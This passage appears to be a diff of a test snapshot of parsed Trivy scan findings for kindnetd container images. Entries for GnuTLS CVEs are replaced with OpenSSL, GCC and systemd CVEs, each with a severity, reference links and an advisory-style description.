'os-pkgs' / Type: 'debian'", - "id": "CVE-2023-0361", - "installedVersion": "3.7.1-5", - "packageName": "libgnutls30", + "fixedVersion": "1.1.1n-0+deb10u5", + "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2023-0466", + "installedVersion": "1.1.1d-0+deb10u4", + "packageName": "libssl1.1", "references": [ - "https://access.redhat.com/errata/RHSA-2023:1141", - "https://access.redhat.com/security/cve/CVE-2023-0361", - "https://bugzilla.redhat.com/2162596", - "https://bugzilla.redhat.com/show_bug.cgi?id=2131152", - "https://bugzilla.redhat.com/show_bug.cgi?id=2162596", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0361", - "https://errata.almalinux.org/9/ALSA-2023-1141.html", - "https://errata.rockylinux.org/RLSA-2023:1569", - "https://github.com/tlsfuzzer/tlsfuzzer/pull/679", - "https://gitlab.com/gnutls/gnutls/-/issues/1050", - "https://gnutls.org/security-new.html#GNUTLS-SA-2020-07-14", - "https://linux.oracle.com/cve/CVE-2023-0361.html", - "https://linux.oracle.com/errata/ELSA-2023-1569.html", - "https://lists.debian.org/debian-lts-announce/2023/02/msg00015.html", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/UFIA3X4IZ3CW7SRQ2UHNHNPMRIAWF2FI/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/WS4KVDOG6QTALWHC2QE4Y7VPDRMLTRWQ/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/Z634YBXAJ5VLDI62IOPBVP5K6YFHAWCY/", - "https://nvd.nist.gov/vuln/detail/CVE-2023-0361", - "https://security.netapp.com/advisory/ntap-20230324-0005/", - "https://ubuntu.com/security/notices/USN-5901-1", - "https://www.cve.org/CVERecord?id=CVE-2023-0361", + "https://access.redhat.com/security/cve/CVE-2023-0466", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0466", + "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=0d16b7e99aafc0b4a6d729eec65a411a7e025f0a", + "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=51e8a84ce742db0f6c70510d0159dad8f7825908", + "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=73398dea26de9899fb4baa94098ad0a61f435c72", + "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=fc814a30fc4f0bc54fcea7d9a7462f5457aab061", + "https://linux.oracle.com/cve/CVE-2023-0466.html", + "https://linux.oracle.com/errata/ELSA-2023-3722.html", + "https://lists.debian.org/debian-lts-announce/2023/06/msg00011.html", + "https://nvd.nist.gov/vuln/detail/CVE-2023-0466", + "https://security.netapp.com/advisory/ntap-20230414-0001/", + "https://ubuntu.com/security/notices/USN-6039-1", + "https://www.cve.org/CVERecord?id=CVE-2023-0466", + "https://www.debian.org/security/2023/dsa-5417", + "https://www.openssl.org/news/secadv/20230328.txt", ], }, "category": "Vulnerability", - "description": "A timing side-channel in the handling of RSA ClientKeyExchange messages was discovered in GnuTLS. This side-channel can be sufficient to recover the key encrypted in the RSA ciphertext across a network in a Bleichenbacher style attack. To achieve a successful decryption the attacker would need to send a large amount of specially crafted messages to the vulnerable server. By recovering the secret from the ClientKeyExchange message, the attacker would be able to decrypt the application data exchanged over that connection.", + "description": +"The function X509_VERIFY_PARAM_add0_policy() is documented to +implicitly enable the certificate policy check when doing certificate +verification. However the implementation of the function does not +enable the check which allows certificates with invalid or incorrect +policies to pass the certificate verification. + +As suddenly enabling the policy check could break existing deployments it was +decided to keep the existing behavior of the X509_VERIFY_PARAM_add0_policy() +function. + +Instead the applications that require OpenSSL to perform certificate +policy check need to use X509_VERIFY_PARAM_set1_policies() or explicitly +enable the policy check by calling X509_VERIFY_PARAM_set_flags() with +the X509_V_FLAG_POLICY_CHECK flag argument. + +Certificate policy checks are disabled by default in OpenSSL and are not +commonly used by applications." +, "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", "mitigation": undefined, - "name": "timing side-channel in the TLS RSA key exchange code", + "name": "Certificate policy check not enabled", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2023-0361", - }, - { - "type": "URL", - "value": "https://access.redhat.com/errata/RHSA-2023:1141", - }, - { - "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2023-0361", - }, - { - "type": "URL", - "value": "https://bugzilla.redhat.com/2162596", - }, - { - "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2131152", - }, - { - "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2162596", - }, - { - "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0361", + "value": "https://avd.aquasec.com/nvd/cve-2023-0466", }, { "type": "URL", - "value": "https://errata.almalinux.org/9/ALSA-2023-1141.html", + "value": "https://access.redhat.com/security/cve/CVE-2023-0466", }, { "type": "URL", - "value": "https://errata.rockylinux.org/RLSA-2023:1569", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0466", }, { "type": "URL", - "value": "https://github.com/tlsfuzzer/tlsfuzzer/pull/679", + "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=0d16b7e99aafc0b4a6d729eec65a411a7e025f0a", }, { "type": "URL", - "value": "https://gitlab.com/gnutls/gnutls/-/issues/1050", + "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=51e8a84ce742db0f6c70510d0159dad8f7825908", }, { "type": "URL", - "value": "https://gnutls.org/security-new.html#GNUTLS-SA-2020-07-14", + "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=73398dea26de9899fb4baa94098ad0a61f435c72", }, { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2023-0361.html", + "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=fc814a30fc4f0bc54fcea7d9a7462f5457aab061", }, { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2023-1569.html", + "value": "https://linux.oracle.com/cve/CVE-2023-0466.html", }, { "type": "URL", - "value": "https://lists.debian.org/debian-lts-announce/2023/02/msg00015.html", + "value": "https://linux.oracle.com/errata/ELSA-2023-3722.html", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/UFIA3X4IZ3CW7SRQ2UHNHNPMRIAWF2FI/", + "value": "https://lists.debian.org/debian-lts-announce/2023/06/msg00011.html", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/WS4KVDOG6QTALWHC2QE4Y7VPDRMLTRWQ/", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2023-0466", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/Z634YBXAJ5VLDI62IOPBVP5K6YFHAWCY/", + "value": "https://security.netapp.com/advisory/ntap-20230414-0001/", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2023-0361", + "value": "https://ubuntu.com/security/notices/USN-6039-1", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20230324-0005/", + "value": "https://www.cve.org/CVERecord?id=CVE-2023-0466", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5901-1", + "value": "https://www.debian.org/security/2023/dsa-5417", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2023-0361", + "value": "https://www.openssl.org/news/secadv/20230328.txt", }, ], - "severity": "HIGH", + "severity": "MEDIUM", }, { "attributes": { - "fixedVersion": "3.7.1-5+deb11u1", - "foundIn": "Target: 'docker.io/kindest/kindnetd:v20220510-4929dd75 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2021-4209", - "installedVersion": "3.7.1-5", - "packageName": "libgnutls30", + "fixedVersion": undefined, + "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2007-6755", + "installedVersion": "1.1.1d-0+deb10u4", + "packageName": "libssl1.1", "references": [ - "https://access.redhat.com/security/cve/CVE-2021-4209", - "https://bugzilla.redhat.com/show_bug.cgi?id=2044156", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-4209", - "https://gitlab.com/gnutls/gnutls/-/commit/3db352734472d851318944db13be73da61300568", - "https://gitlab.com/gnutls/gnutls/-/issues/1306", - "https://gitlab.com/gnutls/gnutls/-/merge_requests/1503", - "https://nvd.nist.gov/vuln/detail/CVE-2021-4209", - "https://security.netapp.com/advisory/ntap-20220915-0005/", - "https://ubuntu.com/security/notices/USN-5550-1", - "https://ubuntu.com/security/notices/USN-5750-1", - "https://www.cve.org/CVERecord?id=CVE-2021-4209", + "http://arstechnica.com/security/2013/09/stop-using-nsa-influence-code-in-our-product-rsa-tells-customers/", + "http://blog.cryptographyengineering.com/2013/09/rsa-warns-developers-against-its-own.html", + "http://blog.cryptographyengineering.com/2013/09/the-many-flaws-of-dualecdrbg.html", + "http://rump2007.cr.yp.to/15-shumow.pdf", + "http://stream.wsj.com/story/latest-headlines/SS-2-63399/SS-2-332655/", + "http://threatpost.com/in-wake-of-latest-crypto-revelations-everything-is-suspect", + "http://www.securityfocus.com/bid/63657", + "https://access.redhat.com/security/cve/CVE-2007-6755", + "https://nvd.nist.gov/vuln/detail/CVE-2007-6755", + "https://www.cve.org/CVERecord?id=CVE-2007-6755", + "https://www.schneier.com/blog/archives/2007/11/the_strange_sto.html", ], }, "category": "Vulnerability", - "description": "A NULL pointer dereference flaw was found in GnuTLS. As Nettle's hash update functions internally call memcpy, providing zero-length input may cause undefined behavior. This flaw leads to a denial of service after authentication in rare circumstances.", + "description": "The NIST SP 800-90A default statement of the Dual Elliptic Curve Deterministic Random Bit Generation (Dual_EC_DRBG) algorithm contains point Q constants with a possible relationship to certain "skeleton key" values, which might allow context-dependent attackers to defeat cryptographic protection mechanisms by leveraging knowledge of those values. NOTE: this is a preliminary CVE for Dual_EC_DRBG; future research may provide additional details about point Q and associated attacks, and could potentially lead to a RECAST or REJECT of this CVE.", "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", "mitigation": undefined, - "name": "GnuTLS: Null pointer dereference in MD_UPDATE", + "name": "Dual_EC_DRBG: weak pseudo random number generator", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2021-4209", + "value": "https://avd.aquasec.com/nvd/cve-2007-6755", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2021-4209", + "value": "http://arstechnica.com/security/2013/09/stop-using-nsa-influence-code-in-our-product-rsa-tells-customers/", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2044156", + "value": "http://blog.cryptographyengineering.com/2013/09/rsa-warns-developers-against-its-own.html", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-4209", + "value": "http://blog.cryptographyengineering.com/2013/09/the-many-flaws-of-dualecdrbg.html", }, { "type": "URL", - "value": "https://gitlab.com/gnutls/gnutls/-/commit/3db352734472d851318944db13be73da61300568", + "value": "http://rump2007.cr.yp.to/15-shumow.pdf", }, { "type": "URL", - "value": "https://gitlab.com/gnutls/gnutls/-/issues/1306", + "value": "http://stream.wsj.com/story/latest-headlines/SS-2-63399/SS-2-332655/", }, { "type": "URL", - "value": "https://gitlab.com/gnutls/gnutls/-/merge_requests/1503", + "value": "http://threatpost.com/in-wake-of-latest-crypto-revelations-everything-is-suspect", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2021-4209", + "value": "http://www.securityfocus.com/bid/63657", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20220915-0005/", + "value": "https://access.redhat.com/security/cve/CVE-2007-6755", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5550-1", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2007-6755", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5750-1", + "value": "https://www.cve.org/CVERecord?id=CVE-2007-6755", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2021-4209", + "value": "https://www.schneier.com/blog/archives/2007/11/the_strange_sto.html", }, ], - "severity": "MEDIUM", + "severity": "LOW", }, { "attributes": { "fixedVersion": undefined, - "foundIn": "Target: 'docker.io/kindest/kindnetd:v20220510-4929dd75 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2011-3389", - "installedVersion": "3.7.1-5", - "packageName": "libgnutls30", + "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2010-0928", + "installedVersion": "1.1.1d-0+deb10u4", + "packageName": "libssl1.1", "references": [ - "http://arcticdog.wordpress.com/2012/08/29/beast-openssl-and-apache/", - "http://blog.mozilla.com/security/2011/09/27/attack-against-tls-protected-communications/", - "http://blogs.technet.com/b/msrc/archive/2011/09/26/microsoft-releases-security-advisory-2588513.aspx", - "http://blogs.technet.com/b/srd/archive/2011/09/26/is-ssl-broken-more-about-security-advisory-2588513.aspx", - "http://curl.haxx.se/docs/adv_20120124B.html", - "http://downloads.asterisk.org/pub/security/AST-2016-001.html", - "http://ekoparty.org/2011/juliano-rizzo.php", - "http://eprint.iacr.org/2004/111", - "http://eprint.iacr.org/2006/136", - "http://googlechromereleases.blogspot.com/2011/10/chrome-stable-release.html", - "http://isc.sans.edu/diary/SSL+TLS+part+3+/11635", - "http://lists.apple.com/archives/Security-announce/2011//Oct/msg00001.html", - "http://lists.apple.com/archives/Security-announce/2011//Oct/msg00002.html", - "http://lists.apple.com/archives/security-announce/2012/Feb/msg00000.html", - "http://lists.apple.com/archives/security-announce/2012/Jul/msg00001.html", - "http://lists.apple.com/archives/security-announce/2012/May/msg00001.html", - "http://lists.apple.com/archives/security-announce/2012/Sep/msg00004.html", - "http://lists.apple.com/archives/security-announce/2013/Oct/msg00004.html", - "http://lists.opensuse.org/opensuse-security-announce/2012-01/msg00049.html", - "http://lists.opensuse.org/opensuse-security-announce/2012-01/msg00051.html", - "http://lists.opensuse.org/opensuse-security-announce/2012-05/msg00009.html", - "http://lists.opensuse.org/opensuse-security-announce/2020-01/msg00040.html", - "http://marc.info/?l=bugtraq&m=132750579901589&w=2", - "http://marc.info/?l=bugtraq&m=132872385320240&w=2", - "http://marc.info/?l=bugtraq&m=133365109612558&w=2", - "http://marc.info/?l=bugtraq&m=133728004526190&w=2", - "http://marc.info/?l=bugtraq&m=134254866602253&w=2", - "http://marc.info/?l=bugtraq&m=134254957702612&w=2", - "http://my.opera.com/securitygroup/blog/2011/09/28/the-beast-ssl-tls-issue", - "http://osvdb.org/74829", - "http://rhn.redhat.com/errata/RHSA-2012-0508.html", - "http://rhn.redhat.com/errata/RHSA-2013-1455.html", - "http://secunia.com/advisories/45791", - "http://secunia.com/advisories/47998", - "http://secunia.com/advisories/48256", - "http://secunia.com/advisories/48692", - "http://secunia.com/advisories/48915", - "http://secunia.com/advisories/48948", - "http://secunia.com/advisories/49198", - "http://secunia.com/advisories/55322", - "http://secunia.com/advisories/55350", - "http://secunia.com/advisories/55351", - "http://security.gentoo.org/glsa/glsa-201203-02.xml", - "http://security.gentoo.org/glsa/glsa-201406-32.xml", - "http://support.apple.com/kb/HT4999", - "http://support.apple.com/kb/HT5001", - "http://support.apple.com/kb/HT5130", - "http://support.apple.com/kb/HT5281", - "http://support.apple.com/kb/HT5501", - "http://support.apple.com/kb/HT6150", - "http://technet.microsoft.com/security/advisory/2588513", - "http://vnhacker.blogspot.com/2011/09/beast.html", - "http://www.apcmedia.com/salestools/SJHN-7RKGNM/SJHN-7RKGNM_R4_EN.pdf", - "http://www.debian.org/security/2012/dsa-2398", - "http://www.educatedguesswork.org/2011/09/security_impact_of_the_rizzodu.html", - "http://www.ibm.com/developerworks/java/jdk/alerts/", - "http://www.imperialviolet.org/2011/09/23/chromeandbeast.html", - "http://www.insecure.cl/Beast-SSL.rar", - "http://www.kb.cert.org/vuls/id/864643", - "http://www.mandriva.com/security/advisories?name=MDVSA-2012:058", - "http://www.opera.com/docs/changelogs/mac/1151/", - "http://www.opera.com/docs/changelogs/mac/1160/", - "http://www.opera.com/docs/changelogs/unix/1151/", - "http://www.opera.com/docs/changelogs/unix/1160/", - "http://www.opera.com/docs/changelogs/windows/1151/", - "http://www.opera.com/docs/changelogs/windows/1160/", - "http://www.opera.com/support/kb/view/1004/", - "http://www.oracle.com/technetwork/topics/security/cpujan2015-1972971.html", - "http://www.oracle.com/technetwork/topics/security/cpujul2015-2367936.html", - "http://www.oracle.com/technetwork/topics/security/javacpuoct2011-443431.html", - "http://www.redhat.com/support/errata/RHSA-2011-1384.html", - "http://www.redhat.com/support/errata/RHSA-2012-0006.html", - "http://www.securityfocus.com/bid/49388", - "http://www.securityfocus.com/bid/49778", - "http://www.securitytracker.com/id/1029190", - "http://www.securitytracker.com/id?1025997", - "http://www.securitytracker.com/id?1026103", - "http://www.securitytracker.com/id?1026704", - "http://www.ubuntu.com/usn/USN-1263-1", - "http://www.us-cert.gov/cas/techalerts/TA12-010A.html", - "https://access.redhat.com/security/cve/CVE-2011-3389", - "https://blogs.oracle.com/sunsecurity/entry/multiple_vulnerabilities_in_fetchmail", - "https://bugzilla.novell.com/show_bug.cgi?id=719047", - "https://bugzilla.redhat.com/show_bug.cgi?id=737506", - "https://cert-portal.siemens.com/productcert/pdf/ssa-556833.pdf", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-3389", - "https://docs.microsoft.com/en-us/security-updates/securitybulletins/2012/ms12-006", - "https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docDisplay?docId=emr_na-c03839862", - "https://hermes.opensuse.org/messages/13154861", - "https://hermes.opensuse.org/messages/13155432", - "https://ics-cert.us-cert.gov/advisories/ICSMA-18-058-02", - "https://linux.oracle.com/cve/CVE-2011-3389.html", - "https://linux.oracle.com/errata/ELSA-2011-1380.html", - "https://nvd.nist.gov/vuln/detail/CVE-2011-3389", - "https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A14752", - "https://ubuntu.com/security/notices/USN-1263-1", - "https://www.cve.org/CVERecord?id=CVE-2011-3389", + "http://rdist.root.org/2010/03/08/attacking-rsa-exponentiation-with-fault-injection/", + "http://www.eecs.umich.edu/%7Evaleria/research/publications/DATE10RSA.pdf", + "http://www.networkworld.com/news/2010/030410-rsa-security-attack.html", + "http://www.osvdb.org/62808", + "http://www.theregister.co.uk/2010/03/04/severe_openssl_vulnerability/", + "https://access.redhat.com/security/cve/CVE-2010-0928", + "https://exchange.xforce.ibmcloud.com/vulnerabilities/56750", + "https://nvd.nist.gov/vuln/detail/CVE-2010-0928", + "https://www.cve.org/CVERecord?id=CVE-2010-0928", ], }, "category": "Vulnerability", - "description": "The SSL protocol, as used in certain configurations in Microsoft Windows and Microsoft Internet Explorer, Mozilla Firefox, Google Chrome, Opera, and other products, encrypts data by using CBC mode with chained initialization vectors, which allows man-in-the-middle attackers to obtain plaintext HTTP headers via a blockwise chosen-boundary attack (BCBA) on an HTTPS session, in conjunction with JavaScript code that uses (1) the HTML5 WebSocket API, (2) the Java URLConnection API, or (3) the Silverlight WebClient API, aka a "BEAST" attack.", + "description": "OpenSSL 0.9.8i on the Gaisler Research LEON3 SoC on the Xilinx Virtex-II Pro FPGA uses a Fixed Width Exponentiation (FWE) algorithm for certain signature calculations, and does not verify the signature before providing it to a caller, which makes it easier for physically proximate attackers to determine the private key via a modified supply voltage for the microprocessor, related to a "fault-based attack."", "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", "mitigation": undefined, - "name": "HTTPS: block-wise chosen-plaintext attack against SSL/TLS (BEAST)", + "name": "openssl: RSA authentication weakness", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2011-3389", - }, - { - "type": "URL", - "value": "http://arcticdog.wordpress.com/2012/08/29/beast-openssl-and-apache/", - }, - { - "type": "URL", - "value": "http://blog.mozilla.com/security/2011/09/27/attack-against-tls-protected-communications/", - }, - { - "type": "URL", - "value": "http://blogs.technet.com/b/msrc/archive/2011/09/26/microsoft-releases-security-advisory-2588513.aspx", + "value": "https://avd.aquasec.com/nvd/cve-2010-0928", }, { "type": "URL", - "value": "http://blogs.technet.com/b/srd/archive/2011/09/26/is-ssl-broken-more-about-security-advisory-2588513.aspx", + "value": "http://rdist.root.org/2010/03/08/attacking-rsa-exponentiation-with-fault-injection/", }, { "type": "URL", - "value": "http://curl.haxx.se/docs/adv_20120124B.html", + "value": "http://www.eecs.umich.edu/%7Evaleria/research/publications/DATE10RSA.pdf", }, { "type": "URL", - "value": "http://downloads.asterisk.org/pub/security/AST-2016-001.html", + "value": "http://www.networkworld.com/news/2010/030410-rsa-security-attack.html", }, { "type": "URL", - "value": "http://ekoparty.org/2011/juliano-rizzo.php", + "value": "http://www.osvdb.org/62808", }, { "type": "URL", - "value": "http://eprint.iacr.org/2004/111", + "value": "http://www.theregister.co.uk/2010/03/04/severe_openssl_vulnerability/", }, { "type": "URL", - "value": "http://eprint.iacr.org/2006/136", + "value": "https://access.redhat.com/security/cve/CVE-2010-0928", }, { "type": "URL", - "value": "http://googlechromereleases.blogspot.com/2011/10/chrome-stable-release.html", + "value": "https://exchange.xforce.ibmcloud.com/vulnerabilities/56750", }, { "type": "URL", - "value": "http://isc.sans.edu/diary/SSL+TLS+part+3+/11635", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2010-0928", }, { "type": "URL", - "value": "http://lists.apple.com/archives/Security-announce/2011//Oct/msg00001.html", + "value": "https://www.cve.org/CVERecord?id=CVE-2010-0928", }, + ], + "severity": "LOW", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2018-12886", + "installedVersion": "8.3.0-6", + "packageName": "libstdc++6", + "references": [ + "https://access.redhat.com/security/cve/CVE-2018-12886", + "https://gcc.gnu.org/viewcvs/gcc/trunk/gcc/config/arm/arm-protos.h?revision=266379&view=markup", + "https://nvd.nist.gov/vuln/detail/CVE-2018-12886", + "https://www.cve.org/CVERecord?id=CVE-2018-12886", + "https://www.gnu.org/software/gcc/gcc-8/changes.html", + ], + }, + "category": "Vulnerability", + "description": "stack_protect_prologue in cfgexpand.c and stack_protect_epilogue in function.c in GNU Compiler Collection (GCC) 4.1 through 8 (under certain circumstances) generate instruction sequences when targeting ARM targets that spill the address of the stack protector guard, which allows an attacker to bypass the protection of -fstack-protector, -fstack-protector-all, -fstack-protector-strong, and -fstack-protector-explicit against stack overflow by controlling what the stack canary is compared against.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", + "mitigation": undefined, + "name": "gcc: spilling of stack protection address in cfgexpand.c and function.c leads to stack-overflow protection bypass", + "references": [ { "type": "URL", - "value": "http://lists.apple.com/archives/Security-announce/2011//Oct/msg00002.html", + "value": "https://avd.aquasec.com/nvd/cve-2018-12886", }, { "type": "URL", - "value": "http://lists.apple.com/archives/security-announce/2012/Feb/msg00000.html", + "value": "https://access.redhat.com/security/cve/CVE-2018-12886", }, { "type": "URL", - "value": "http://lists.apple.com/archives/security-announce/2012/Jul/msg00001.html", + "value": "https://gcc.gnu.org/viewcvs/gcc/trunk/gcc/config/arm/arm-protos.h?revision=266379&view=markup", }, { "type": "URL", - "value": "http://lists.apple.com/archives/security-announce/2012/May/msg00001.html", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2018-12886", }, { "type": "URL", - "value": "http://lists.apple.com/archives/security-announce/2012/Sep/msg00004.html", + "value": "https://www.cve.org/CVERecord?id=CVE-2018-12886", }, { "type": "URL", - "value": "http://lists.apple.com/archives/security-announce/2013/Oct/msg00004.html", + "value": "https://www.gnu.org/software/gcc/gcc-8/changes.html", }, + ], + "severity": "HIGH", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2019-15847", + "installedVersion": "8.3.0-6", + "packageName": "libstdc++6", + "references": [ + "http://lists.opensuse.org/opensuse-security-announce/2019-10/msg00056.html", + "http://lists.opensuse.org/opensuse-security-announce/2019-10/msg00057.html", + "http://lists.opensuse.org/opensuse-security-announce/2020-05/msg00058.html", + "https://access.redhat.com/security/cve/CVE-2019-15847", + "https://gcc.gnu.org/bugzilla/show_bug.cgi?id=91481", + "https://linux.oracle.com/cve/CVE-2019-15847.html", + "https://linux.oracle.com/errata/ELSA-2020-1864.html", + "https://nvd.nist.gov/vuln/detail/CVE-2019-15847", + "https://www.cve.org/CVERecord?id=CVE-2019-15847", + ], + }, + "category": "Vulnerability", + "description": "The POWER9 backend in GNU Compiler Collection (GCC) before version 10 could optimize multiple calls of the __builtin_darn intrinsic into a single call, thus reducing the entropy of the random number generator. This occurred because a volatile operation was not specified. For example, within a single execution of a program, the output of every __builtin_darn() call may be the same.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", + "mitigation": undefined, + "name": "gcc: POWER9 "DARN" RNG intrinsic produces repeated output", + "references": [ { "type": "URL", - "value": "http://lists.opensuse.org/opensuse-security-announce/2012-01/msg00049.html", + "value": "https://avd.aquasec.com/nvd/cve-2019-15847", }, { "type": "URL", - "value": "http://lists.opensuse.org/opensuse-security-announce/2012-01/msg00051.html", + "value": "http://lists.opensuse.org/opensuse-security-announce/2019-10/msg00056.html", }, { "type": "URL", - "value": "http://lists.opensuse.org/opensuse-security-announce/2012-05/msg00009.html", + "value": "http://lists.opensuse.org/opensuse-security-announce/2019-10/msg00057.html", }, { "type": "URL", - "value": "http://lists.opensuse.org/opensuse-security-announce/2020-01/msg00040.html", + "value": "http://lists.opensuse.org/opensuse-security-announce/2020-05/msg00058.html", }, { "type": "URL", - "value": "http://marc.info/?l=bugtraq&m=132750579901589&w=2", + "value": "https://access.redhat.com/security/cve/CVE-2019-15847", }, { "type": "URL", - "value": "http://marc.info/?l=bugtraq&m=132872385320240&w=2", + "value": "https://gcc.gnu.org/bugzilla/show_bug.cgi?id=91481", }, { "type": "URL", - "value": "http://marc.info/?l=bugtraq&m=133365109612558&w=2", + "value": "https://linux.oracle.com/cve/CVE-2019-15847.html", }, { "type": "URL", - "value": "http://marc.info/?l=bugtraq&m=133728004526190&w=2", + "value": "https://linux.oracle.com/errata/ELSA-2020-1864.html", }, { "type": "URL", - "value": "http://marc.info/?l=bugtraq&m=134254866602253&w=2", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2019-15847", }, { "type": "URL", - "value": "http://marc.info/?l=bugtraq&m=134254957702612&w=2", + "value": "https://www.cve.org/CVERecord?id=CVE-2019-15847", }, + ], + "severity": "HIGH", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2019-3843", + "installedVersion": "241-7~deb10u5", + "packageName": "libsystemd0", + "references": [ + "http://www.securityfocus.com/bid/108116", + "https://access.redhat.com/security/cve/CVE-2019-3843", + "https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2019-3843", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-3843", + "https://github.com/systemd/systemd-stable/pull/54 (backport for v241-stable)", + "https://linux.oracle.com/cve/CVE-2019-3843.html", + "https://linux.oracle.com/errata/ELSA-2020-1794.html", + "https://lists.apache.org/thread.html/r58af02e294bd07f487e2c64ffc0a29b837db5600e33b6e698b9d696b@%3Cissues.bookkeeper.apache.org%3E", + "https://lists.apache.org/thread.html/rf4c02775860db415b4955778a131c2795223f61cb8c6a450893651e4@%3Cissues.bookkeeper.apache.org%3E", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/5JXQAKSTMABZ46EVCRMW62DHWYHTTFES/", + "https://nvd.nist.gov/vuln/detail/CVE-2019-3843", + "https://security.netapp.com/advisory/ntap-20190619-0002/", + "https://ubuntu.com/security/notices/USN-4269-1", + "https://usn.ubuntu.com/4269-1/", + "https://www.cve.org/CVERecord?id=CVE-2019-3843", + ], + }, + "category": "Vulnerability", + "description": "It was discovered that a systemd service that uses DynamicUser property can create a SUID/SGID binary that would be allowed to run as the transient service UID/GID even after the service is terminated. A local attacker may use this flaw to access resources that will be owned by a potentially different service in the future, when the UID/GID will be recycled.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", + "mitigation": undefined, + "name": "systemd: services with DynamicUser can create SUID/SGID binaries", + "references": [ { "type": "URL", - "value": "http://my.opera.com/securitygroup/blog/2011/09/28/the-beast-ssl-tls-issue", + "value": "https://avd.aquasec.com/nvd/cve-2019-3843", }, { "type": "URL", - "value": "http://osvdb.org/74829", + "value": "http://www.securityfocus.com/bid/108116", }, { "type": "URL", - "value": "http://rhn.redhat.com/errata/RHSA-2012-0508.html", + "value": "https://access.redhat.com/security/cve/CVE-2019-3843", }, { "type": "URL", - "value": "http://rhn.redhat.com/errata/RHSA-2013-1455.html", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2019-3843", }, { "type": "URL", - "value": "http://secunia.com/advisories/45791", + "value": 